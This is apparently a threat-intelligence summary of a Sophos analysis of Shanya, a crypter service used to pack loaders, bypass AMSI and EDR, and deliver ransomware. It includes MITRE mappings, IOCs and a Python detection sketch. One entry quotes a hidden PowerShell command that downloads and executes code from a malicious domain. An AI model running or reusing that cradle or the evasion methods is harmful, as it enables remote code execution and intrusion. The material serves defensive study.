Inside Shanya, a packer-as-a-service fueling modern attacks

Shanya is a packer-as-a-service (crypter) widely used in 2025 to obfuscate loaders and payloads, enable AMSI and UAC bypasses, perform DLL side-loading, and deliver EDR-killing components that facilitate ransomware and backdoor deployments. The service has been linked to multiple malware families and operations—including CastleRAT and Akira—and associated IOCs include packed sample hashes, malicious domains, and side-loaded DLL/file names. #Shanya #CastleRAT

Key points

  • Shanya is a crypter/packer-as-a-service promoted in underground forums and adopted by multiple ransomware and malware operators.
  • Early samples contained identifying artifacts (e.g., shanya_crypter.exe and morphed DLL names) that tied multiple samples to the same service.
  • The packer employs heavy obfuscation, API hashing, hiding data in the PEB (GdiHandleBuffer), AMSI bypass for .NET, anti-VM/sandbox checks, and RtlDeleteFunctionTable anti-analysis abuse.
  • Loaders overwrite a second instance of a legitimate system DLL in memory (commonly shell32.dll), modify LDR structures, and load a decrypted/compressed payload via undocumented LdrLoadDll behavior.
  • A prominent use case is an EDR killer deployed via DLL side-loading (e.g., consent.exe + msimg32.dll) that loads a malicious kernel driver by abusing a vulnerable clean driver to terminate protection processes and services.
  • Shanya-packed files have been observed delivering multiple malware families (e.g., BumbleBee, StealC, CastleRAT) and supporting ransomware operations including Akira, Qilin, Crytox, and Medusa-linked campaigns.
  • Observed distribution included global detections during 2025 with notable prevalence in specific countries; Sophos provides detections labeled ATK/Shanya-B/C/D and published IOCs on GitHub.

MITRE Techniques

  • [T1071.001] Application Layer Protocol: Web Protocols – Used by CastleRAT to fetch next-stage payloads via PowerShell web requests (powershell -w h -ep b -c "iex (iwr 'biokdsl[.]com/upd' -useb).Content").
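As an added illustration (not code from the Sophos write-up or from Shanya itself), the Python below sketches detection logic for two patterns this page names: the abbreviated PowerShell download cradle quoted in the T1071.001 entry, and the consent.exe + msimg32.dll side-loading pair from the key points. The Sysmon-style event records, their field names and the 100 MB "inflated DLL" threshold are constructed assumptions, not values from the report.

```python
import re
from pathlib import PureWindowsPath
SIDELOADED_DLLS = {"msimg32.dll", "wmsgapi.dll"}      # side-loaded DLL names named in the write-up
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
INFLATED_BYTES = 100 * 1024 * 1024                    # hypothetical threshold; the reported DLL was ~656 MB

# Constructed Sysmon-style records (not captured data); the first command line is the one quoted above.
EVENTS = [
    {"type": "process_create", "cmdline": "powershell -w h -ep b -c \"iex (iwr 'biokdsl[.]com/upd' -useb).Content\""},
    {"type": "process_create", "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"type": "image_load", "image": r"C:\Users\Public\consent.exe",
     "module": r"C:\Users\Public\msimg32.dll", "module_size": 656 * 1024 * 1024},
    {"type": "image_load", "image": r"C:\Windows\System32\consent.exe",
     "module": r"C:\Windows\System32\msimg32.dll", "module_size": 40 * 1024},
]

def _abbrev(token, full, minimum):
    # powershell.exe accepts abbreviated switches, so "-w h" is treated like "-WindowStyle Hidden".
    t = token.lower()
    return len(t) >= len(minimum) and full.startswith(t)

def powershell_cradle_flags(cmdline):
    """Traits of a powershell.exe command line that together make up a download cradle."""
    flags = set()
    tokens = re.sub("[\"']", " ", cmdline).split()       # quotes only get in the way of switch matching
    for tok, nxt in zip(tokens, tokens[1:]):
        name = tok[1:].lower() if tok.startswith("-") else ""
        if _abbrev(name, "windowstyle", "w") and _abbrev(nxt, "hidden", "h"):
            flags.add("hidden_window")
        if (name == "ep" or _abbrev(name, "executionpolicy", "ex")) and _abbrev(nxt, "bypass", "b"):
            flags.add("ep_bypass")
    low = cmdline.lower()
    if re.search(r"\b(iex|invoke-expression)\b", low) and re.search(r"\b(iwr|invoke-webrequest|downloadstring)\b", low):
        flags.add("download_cradle")                      # code fetched over HTTP and run in memory
    return flags

def sideload_flags(event):
    """Traits of a DLL load matching the consent.exe + msimg32.dll side-loading pattern."""
    flags = set()
    module = PureWindowsPath(event["module"])
    if module.name.lower() not in SIDELOADED_DLLS:
        return flags
    if not str(module.parent).lower().startswith(SYSTEM_DIRS):
        flags.add("dll_outside_system_dir")
    if not event["image"].lower().startswith(SYSTEM_DIRS):
        flags.add("host_binary_relocated")                # a system binary copied next to its lookalike DLL
    if event["module_size"] > INFLATED_BYTES:
        flags.add("inflated_dll")                         # padding to defeat size-limited scanners
    return flags
```

Scoring on the number of traits per event rather than any single one keeps an administrator's `-ExecutionPolicy Bypass -File` script from firing alongside the three-trait cradle.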

Indicators of Compromise

  • [File Hash] packed and sample hashes – 6645297a0a423564f99b9f474b0df234d6613d04df48a94cb67f541b8eb829d1, 59906b022adfc6f63903adbdbb64c82881e0b1664d6b7f7ee42319019fcb3d7e (and 2 more hashes).
  • [Domain] download, C2 and update servers used in campaigns – biokdsl[.]com/upd, biklkfd[.]com/upd.
  • [File Name] side-loading and loader artifacts – consent.exe, msimg32.dll, wmsgapi.dll (malicious side-loaded DLL inflated to ~656 MB).
  • [DLL/Module Name] modified or impersonated system modules observed in memory – shell32.dll mapped as mustard64.dll (flagged by PE-sieve), shanya_f■ck4v_0x000CFA85…dll.
  • [Driver/File] kernel drivers involved in the EDR-killer chain – ThrottleStop.sys (rwdrv.sys; legitimate driver abused), hlpdrv.sys (malicious unsigned driver).

Read more: https://news.sophos.com/en-us/2025/12/06/inside-shanya-a-packer-as-a-service-fueling-modern-attacks/